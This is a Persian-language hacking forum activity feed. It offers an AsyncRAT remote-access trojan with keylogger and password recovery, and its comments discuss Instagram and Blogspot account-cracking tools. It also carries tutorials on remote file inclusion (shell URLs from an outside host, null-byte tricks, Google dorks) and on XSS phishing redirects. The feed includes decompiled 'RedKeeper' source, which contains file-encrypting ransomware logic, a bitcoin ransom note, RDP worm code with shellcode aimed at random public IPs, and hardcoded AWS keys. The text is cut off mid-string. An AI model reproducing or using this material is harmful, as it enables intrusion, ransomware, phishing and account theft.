رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

تمامی فعالیت ها

این جریان به طور خودکار بروزرسانی می شود     

  1. امروز
  2. Stubborn

    AsyncRAT

    Client screen viewer & recorder Client Antivirus & Integrity manager Client SFTP access including upload & download Client & Server chat window Client Dynamic DNS & Multi-Server support (Configurable) Client Password Recovery Client JIT compiler Client Keylogger Client Anti Analysis (Configurable) Server Controlled updates Client Antimalware Start-up Server Config Editor Server multiport receiver (Configurable) Server thumbnails Server binary builder (Configurable) Server obfuscator (Configurable) AsyncRAT-C-Sharp-master.zip
  3. دیروز
  4. سلام امروز بابخش دوم Website hacking theory در خدمتتونم خب میریم سر بحث اصلی Remote File Inclusion گنجاندن پرونده از راه دور (RFI) هنگامی اتفاق می افتد که یک پرونده راه دور ، معمولاً یک پوسته (یک رابط گرافیکی برای مرور فایلهای از راه دور و اجرای کد شخصی شما روی یک سرور) ، در یک وب سایت گنجانده می شود که به هکر اجازه می دهد دستورات سمت سرور را به عنوان فعلی اجرا کند. روی کاربر وارد شده و به پرونده های روی سرور دسترسی داشته باشید. با استفاده از این قدرت ، هکر می تواند به استفاده از سوء استفاده های محلی ادامه دهد تا امتیازات خود را افزایش داده و کل سیستم را به دست بگیرد. بسیاری از سرورها به دلیل تنظیمات پیش فرض PHP در ثبت_گلوبارها و اجازه فعال شدن اجازه_ورل_فوپن در برابر این نوع حمله آسیب پذیر هستند. اگرچه از PHP 6.0 ، Register_globals حذف شده است ، اما بسیاری از وب سایت ها هنوز به نسخه های قدیمی تر PHP اعتماد می کنند تا وب خود را اجرا کنند. اکنون قدم هایی را که یک هکر برای سوءاستفاده از این نوع آسیب پذیری در یک وب سایت می گذارد ، طی خواهیم کرد. 1. ابتدا هکر وب سایتی را پیدا می کند که صفحات خود را از طریق PHP شامل عملکرد () () () می کند و در برابر RFI آسیب پذیر است. بسیاری از هکرها از دستگیره های گوگل استفاده می کنند تا سرورهای آسیب پذیر RFI را پیدا کنند. Dork Google عملی است که از ابزارهای جستجوی ارائه شده Google برای کمک به نتیجه جستجوی خاص استفاده می کند. 2. وب سایت هایی که شامل صفحات هستند دارای یک سیستم ناوبری شبیه به: http://target-site.com/index.php?page=PageName 3. برای دیدن اینکه آیا یک صفحه آسیب پذیر است ، هکر سعی می کند یک سایت را به جای PageName مانند موارد زیر بگذارد: http://target-site.com/index.php?page=http://google.com 4- اگر صفحه اصلی گوگل در وب سایت نشان داده شود ، هکر می داند وب سایت آسیب پذیر است و همچنان شامل پوسته می شود. 5. از محبوب ترین پوسته ها c99 و r57 هستند (خودم به b374k علاقه دارم ). یک هکر یا آنها را در یک سرور از راه دور بارگذاری می کند یا فقط از یک گوگل استفاده می کند . برای یافتن آنها در حال حاضر( آنلاین ) ، هکر در جستجوی Google می باشد: inurl: c99.txt. با این کار بسیاری از وب سایت ها با پوسته از قبل آماده شده و آماده گنجانده شدن هستند را نشان میدهد . در پایان URL مطمئن شوید که می خواهید یک اضافه کنید؟ به طوری که اگر هر چیزی بعد از c99.txt بیاید ، به پوسته منتقل می شود و مشکلی ایجاد نمی کند. نشانی اینترنتی جدید با پوسته شامل می شود: http://target-site.com/index.php?page=http://site.com/c99.txt? 6. بعضی اوقات اسکریپت PHP در سرور ".php" را به انتهای هر پرونده اضافه می کند. بنابراین اگر پوسته را گنجانده باشید ، در نهایت مانند "c99.txt.php" به نظر می رسد و کار نمی کند. برای بدست آوردن این مسئله ، یک بایت تهی (00٪) به انتهای c99.txt اضافه می کنید. این به سرور می گوید که همه چیز را پس از c99.txt نادیده بگیرد. 7. در مرحله اول ، به شما گفتم كه هكرها از دستكارهای Google استفاده می كنند تا به دنبال سایتهایی باشند كه احتمالاً در معرض RFI آسیب پذیر باشند. نمونه ای از Google Dork خواهد بود . allinurl:.php?page=. این به دنبال آدرس URL با .php?page= در آنها است. این فقط یک نمونه است و شما به احتمال زیاد هیچ سایت آسیب پذیر با آن جستجو پیدا نمی کنید. می توانید کلمه "صفحه" را با حروف دیگر و کلمات مشابه تغییر دهید. هکرها معمولاً برای یافتن آسیب پذیری های RFI در سیستم های مدیریت محتوای سایت ، از Google dork استفاده میکنند. 8. اگر هکر موفق شد سرور را برای تجزیه پوسته بدست آورد ، به وی صفحه ای شبیه به شکل زیر ارائه می شود: از اینجا هکر دایرکتوری پیدا می کند که امتیازات خواندن و نوشتن را دارد و پوسته را بارگذاری می کند اما این بار به عنوان یک پرونده .php به طوری که آسیب پذیری برطرف شود ، وی بعداً می تواند به آن دسترسی پیدا کند. 9- هکر بعداً راهی برای به دست آوردن امتیازات اصلی در سیستم پیدا می کند. او می تواند این کار را با بارگیری و اجرای بهره برداری های محلی در برابر سرور انجام دهد. او همچنین می تواند سرور قربانی را برای پرونده های پیکربندی جستجو کند. این پرونده ها ممکن است حاوی نام کاربری و کلمه عبور برای پایگاه داده های MYSQL و مواردی از این دست باشد. برای محافظت از خود در برابر حملات RFI ، کافیست از اسکریپت های به روز استفاده کنید و مطمئن شوید که فایل php.ini سرور دارای Register_globals و lejed_url_fopen غیرفعال است. ادامه دارد .....
  5. هفته گذشته
  6. با توجه به عصر وب 2.0 ، بیشتر وب سایت ها پویا هستند و به کاربران اجازه می دهند تا با محتوا ارتباط برقرار کنند. بسیاری از برنامه های وب که این وب سایت های پویا را اجرا می کنند دارای نقص امنیتی هستند. در این فصل ، ما در مورد برخی از محبوب ترین اشکال حملات علیه برنامه های وب بحث خواهیم کرد Cross Site Scripting اسکریپت نویسی سایت متقاطع (XSS) وقتی اتفاق می افتد که کاربر داده های مخرب را به یک وب سایت وارد می کند ، و این باعث می شود برنامه کاری را انجام دهد که قصد انجام آن را نداشته باشد. حملات XSS بسیار محبوب هستند و برخی از بزرگترین وب سایتها تحت تأثیر آنها قرار گرفته اند از جمله FBI ، CNN ، Ebay ، اپل ، میکروستft و AOL. برخی از ویژگیهای وب سایت که معمولاً در برابر حملات XSS آسیب پذیر هستند عبارتند از: • موتورهای جستجو • فرم های ورود • زمینه های نظر سه نوع حمله XSS وجود دارد: 1. محلی - حملات محلی XSS بسیار نادرترین و سخت ترین اجرای آن هستند. این حمله به یک آسیب پذیری برای مرورگر نیاز دارد. با استفاده از این نوع حمله ، هکر می تواند کرم ها ، هرزنامه ها و Backdoors را روی رایانه شما نصب کند. 2. غیر مداوم - حملات غیر مداوم رایج ترین انواع حمله هستند و به وب سایت واقعی آسیب نمی رسانند. حملات غیر مداوم هنگامی رخ می دهد که (- یک زبان برنامه نویسی که برای توسعه وب توسط مشتری استفاده می شود) یا HTML باشد در یک متغیر وارد می شود که باعث می شود خروجی تغییر یافته کاربر مشاهده شود. حملات غیر مداوم فقط هنگامی فعال می شوند که کاربر از URL ایجاد شده توسط مهاجم بازدید کند. 3. مداوم - حملات مداوم معمولاً علیه برنامه های وب مانند کتاب های مهمان ، انجمن ها و جعبه های فریاد استفاده می شود. برخی از کارهایی که هکر می تواند با حملات مداوم انجام دهد عبارتند از: • سرقت کوکی های وب سایت (کوکی ها توسط مرورگرهای وب استفاده می شوند تا اطلاعات کاربر شما را ذخیره کنند تا بتوانید حتی پس از ترک شدن در وب سایت بمانید. با سرقت کوکی خود ، مهاجم گاهی می تواند بدون دانستن رمز عبور خود وارد سیستم شود.) • وب سایت را Default کنید • گسترش کرم ها اکنون که می دانید cross site scripting چیست ، چگونه می توانید بگویید وب سایت در صورت آسیب پذیری بودن آن چیست؟ 1. اگر یک قسمت جستجو وجود دارد ، یک کلمه را وارد کنید و اگر آن کلمه در صفحه بعد به شما نشان داده می شود ، احتمال اینکه آسیب پذیر باشد وجود دارد. 2. حالا مقداری HTML وارد می کنیم. <h1> سلام </ h1> را جستجو کنید ، و اگر کلمه "سلام" به عنوان یک سربرگ بزرگ تولید شده باشد ، آسیب پذیر است. 3. حالا جاوا اسکریپت را وارد خواهیم کرد. هشدار <script> ("سلام") را جستجو کنید ، </script> ، اگر کلمه "سلام" در یک کادر بازشو ظاهر شود ، سایت در برابر XSS آسیب پذیر است. 4- همانطور که مشاهده می کنید ، این مثالها ماندگار نیستند. حال اگر هکر یک کتاب میهمان یا چیز دیگری مانند آن را پیدا کند که آسیب پذیر باشد ، می تواند آن را ماندگار کند و هر کس که به صفحه مراجعه می کند اگر بخشی از اظهار نظر وی باشد ، هشدار فوق را دریافت می کند. هکرهای آگاه در جاوا اسکریپت و PHP می توانند از حملات پیشرفته XSS استفاده کنند تا کوکی های شما را سرقت کنند و کرم های XSS را گسترش دهند ، اما برای نشان دادن یک مثال ساده از چیزی واقعی تر از نمونه های فوق ، من به شما نشان خواهم داد که چگونه یک هکر می تواند از XSS استفاده کند. به فیشینگ کمک کنید 1. بیایید بگوییم هکر می خواهد رمزهای عبور را از سایت www.victim-site.com رمزنگاری کند. اگر او می توانست آسیب پذیری XSS را در هر نقطه از وب سایت پیدا کند ، می تواند پیوندی را به وب سایت قانونی که به وب سایت فیشینگ خود هدایت می کند ، طراحی کند. 2. در مثال همراه با پنجره ، وقتی جاوا اسکریپت را در جعبه جستجو وارد کردم ، URL ایجاد شد که مانند زیر است: در اینجا می توانید ببینید که کدی که در جعبه جستجو تایپ کرده اید به متغیر "جعبه جستجو" منتقل شده است. 3. در URL ، هکر همه چیز را بین؟ searchbox = و & کد زیر را جستجو می کند: <script> windows.location = "http://phishing-site.com" </script> 4- اکنون وقتی به لینک نهایی بروید ، سایت قانونی به وب سایت فیشینگ هدایت می شود. در مرحله بعد آنچه هکر انجام می دهد رمزگذاری آدرس اینترنتی است تا به نظر قانونی تر و کمتر مشکوک شود. می توانید URL را در http://www.encodeurl.com/ رمزگذاری کنید. 5. URL رمزگذاری شده من به پایان رسیده است: http٪ 3A٪ 2F٪ 2Flocalhost٪ 2Fform.php٪ 3Fsearchbox٪ 3D٪ 3Cscript٪ 3Ewindow.location +٪ 3D +٪ 5C٪ 22http٪ 3A٪ 2F٪ 2Fphishing-site.com٪ 5C٪ 22٪ 3C٪ 2Fscript٪ 3E٪ 26search٪ 3Dsearch٪ 21 6. هنگامی که قربانی می بیند که این لینک به وب سایت قانونی نشان می دهد ، احتمال حمله وی به فیشینگ بیشتر می شود. ادامه دارد ......
  7. magyar

    Instagram Account Cracker [priv8]

    داداش کار نمیکنه چرا ؟
  8. جدیدا
  9. magyar

    Instagram Account Cracker [priv8]

    ببخشید این brute force تون تو لینوکس پسو پیدا نمیکنه تو ویندوز میزنه some thing was not true
  10. Stubborn

    ICG™ BlogspotCracker

    کاش دیگر دوستانم همکاری کنن و چنین جویئ شاهد باشیم برای مثال من لوگین پیچو فعلا نمینونم پیدا کنم زمان بر هست برا من و تخصص من دیگر دوستان که در این هیته فعالیت دارن کمک کنن که بتونیم ایشالا ه فعالیت مسر ثمر داشتع باشیم.
  11. Stubborn

    ICG™ BlogspotCracker

    سلام بهم گفتن مشکل برنامه از لوگین پیچه blogspot هست که درش میارم اوکی میکنم چشم .. ببخشید یخورده زمان میبره .. برنامه های اینده رو با ویدیو میزارم. فعلا زمان بازنویسی برنامه رو ندارم
  12. 0day

    ICG™ BlogspotCracker

    با احترام و تشکر لطفا یک ویدئو هم از صحت کارکردش درست کنید بصورت تست
  13. Stubborn

    RedKeeper Malware

    # Python bytecode 2.7 (62211) # Decompiled from: Python 2.7.16 (default, Apr 12 2019, 15:32:40) # [GCC 4.2.1 Compatible Apple LLVM 10.0.1 (clang-1001.0.46.3)] # Embedded file name: redkeeper.py # Compiled at: 2019-09-20 11:31:08 from os.path import expanduser import socket import glob import os from random import randint, choice import struct import string from Crypto.Cipher import AES from Crypto.Hash import SHA256 from Crypto import Random import requests import sys aws_access_key_id = 'AKIA35OHX2DSKHT73VPQ' aws_secret_access_key = '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' def pdu_connect_initial(hostname): host_name = '' for i in hostname: host_name += struct.pack('<h', ord(i)) host_name += '\x00' * (32 - len(host_name)) mcs_gcc_request = '\x03\x00\x01\xca\x02\xf0\x80\x7fe\x82\x01\xbe\x04\x01\x01\x04\x01\x01\x01\x01\xff0 \x02\x02\x00"\x02\x02\x00\x02\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\xff\xff\x02\x02\x00\x020 \x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\x04 \x02\x02\x00\x020 \x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\xff\xff\x02\x02\x00\x02\x04\x82\x01K\x00\x05\x00\x14|\x00\x01\x81B\x00\x08\x00\x10\x00\x01\xc0\x00Duca\x814\x01\xc0\xd8\x00\x04\x00\x08\x00 \x03X\x02\x01\xca\x03\xaa\t\x04\x00\x00(\n\x00\x00' mcs_gcc_request += host_name mcs_gcc_request += '\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x07\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xc0\x0c\x00\t\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\xc0D\x00\x04\x00\x00\x00' channel_name = [ 'NEVER\x00\x00\x00\x00\x00\x00\x00', 'GONNA\x00\x00\x00\x00\x00\x00\x00', 'GIVE\x00\x00\x00\x00\x00\x00\x00\x00', 'YOU\x00\x00\x00\x00\x00\x00\x00\x00\x00', 'UP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'] mcs_gcc_request += choice(channel_name) mcs_gcc_request += 'MS_T120\x00\x00\x00\x00\x00rdpsnd\x00\x00\xc0\x00\x00\x00snddbg\x00\x00\xc0\x00\x00\x00rdpdr\x00\x00\x00\x80\x80\x00\x00' return mcs_gcc_request def worm(target): uname = [ '@e_kaspersky', '@briankrebs', '@kevinmitnick'] hname = ['talso', 'sphos', 'startgame', 'mcoffee', 'slowseven', 'selloutvault', 'stratforkoff'] username = choice(uname) hostname = choice(hname) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) s.connect((target, 3389)) except Exception as e: s.close() return x_224_conn_req = '\x03\x00\x00{0}' x_224_conn_req += chr(33 + len(username)) x_224_conn_req += '\xe0' x_224_conn_req += '\x00\x00' x_224_conn_req += '\x00\x00' x_224_conn_req += '\x00' x_224_conn_req += 'Cookie: mstshash=' x_224_conn_req += username x_224_conn_req += '\r\n' x_224_conn_req += '\x01' x_224_conn_req += '\x00' x_224_conn_req += '\x08\x00' x_224_conn_req += '\x00\x00\x00\x00' try: s.sendall(x_224_conn_req.format(chr(33 + len(username) + 5))) s.recv(8192) s.sendall(pdu_connect_initial(hostname)) res = s.recv(10000) except Exception as e: s.close() return shellcode = '1\xc9' shellcode += 'd\x8bq0' shellcode += '\x8bv\x0c' shellcode += '\x8bv\x1c' shellcode += '\x8b6' shellcode += '\x8b\x06' shellcode += '\x8bh\x08' shellcode += '\xeb ' shellcode += '[' shellcode += 'S' shellcode += 'U' shellcode += '[' shellcode += '\x81\xeb\x11\x11\x11\x11' shellcode += '\x81\xc3\xda?\x1a\x11' shellcode += '\xff\xd3' shellcode += '\x81\xc3\x11\x11\x11\x11' shellcode += '\x81\xeb\x8c\xcc\x18\x11' shellcode += '\xff\xd3' shellcode += '\xe8\xdb\xff\xff\xff' shellcode += 'cmd' try: s.sendall(shellcode) s.close() except Exception as e: s.close() return def drop_note(img): bdy = ['You wil have to pay us before you git him from us, and pay us a big cent to, if you put the cops hunting for him you is only defeeting yu own end.', 'If you install this on a microcomputer... then under terms of this license you agree to pay PC Cyborg Corporation in full for the cost of leasing these programs...In the case of your breach of this license agreement, PC Cyborg reserves the right to take legal action necessary to recover any outstanding debts payable to PC Cyborg Corporation and to use program mechanisms to ensure termination of your use...These program mechanisms will adversely affect other program applications...You are hereby advised of the most serious consequences of your failure to abide by the terms of this license agreement; your conscience may haunt you for the rest of your life...and your PC will stop functioning normally... You are strictly prohibited from sharing this product with others...', 'A company can spend hundreds of thousands of dollars on firewalls, intrusion detection systems and encryption and other security technologies, but if an attacker can call one trusted person within the company, and that person complies, and if the attacker gets in, then all that money spent on technology is essentially wasted.', 'You cannot arrest an idea', 'Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.', 'All right hes in the personal ads. Disappointed white male. Cross dresser looking for discreet friend to bring dreams to realiy. Leather, lace and water sports. Transvestites welcome.'] footer = "Your files have been encrypted. To decrypt your files send 1,000,000 satoshi (Don't you think we should ask more than 1 million satoshi ?) to address 19GL2cUrn1Xx8XD6VaL25SYAzQd6qnwVb7 " special = 'If you like to be a hero when balance is over 100,000,000 satoshi kill switch activates !?! ' note = img + '\n\n\n' + choice(bdy) + '\n\n\n' + footer + '\n\n\n' + special f = open('RTFM.txt', 'a+') f.write(note) f.close() try: os.startfile('RTFM.txt') except Exception as e: print 'Failed to open note {}'.format(e) def check_domz(switch): try: socket.gethostbyname(switch) except socket.gaierror: return False return True def getKey(password): hasher = SHA256.new(password.encode('utf-8')) return hasher.digest() def encrypt(key, filename): chunksize = 65536 outputFile = '(encrypted)' + filename filesize = str(os.path.getsize(filename)).zfill(16) IV = Random.new().read(16) encryptor = AES.new(key, AES.MODE_CBC, IV) with open(filename, 'rb') as infile: with open(outputFile, 'wb') as outfile: outfile.write(filesize.encode('utf-8')) outfile.write(IV) while True: chunk = infile.read(chunksize) if len(chunk) == 0: break elif len(chunk) % 16 != 0: chunk += '*(16 \xe2\x80\x93 (len(chunk) % 16))' outfile.write(encryptor.encrypt(chunk)) def encrypt_files(): extension = [ 'WNCRY', 'PCCyborg', 'NEVER', 'GONNA', 'GIVE', 'YOU', 'UP'] encrypt_key = 'TESTTESTTESTTEST' os.chdir(expanduser('~\\Desktop')) files_grabbed = [ glob.glob(e) for e in ['*.txt', '*.doc', '*.png', '*.jpg', '.*rtf'] ] for files in files_grabbed: for fil in files: f1 = open(fil, 'r') f1.close() fname = fil + '.' + choice(extension) f = open(fname, 'a+') f.write(nyan) f.close() def self_replicate(): pass def get_local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(('1.3.3.7', 1)) local_ip_address = s.getsockname()[0] s.close() return local_ip_address def get_worm_public_target(): octets = [] for x in range(4): octets.append(str(randint(0, 255))) return '.'.join(octets) if __name__ == '__main__': switch = 'iuqerfsodp9ifjaposdfjhgosurijfaewrwergwe' + choice(string.ascii_lowercase) + '.com' nyan = '\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2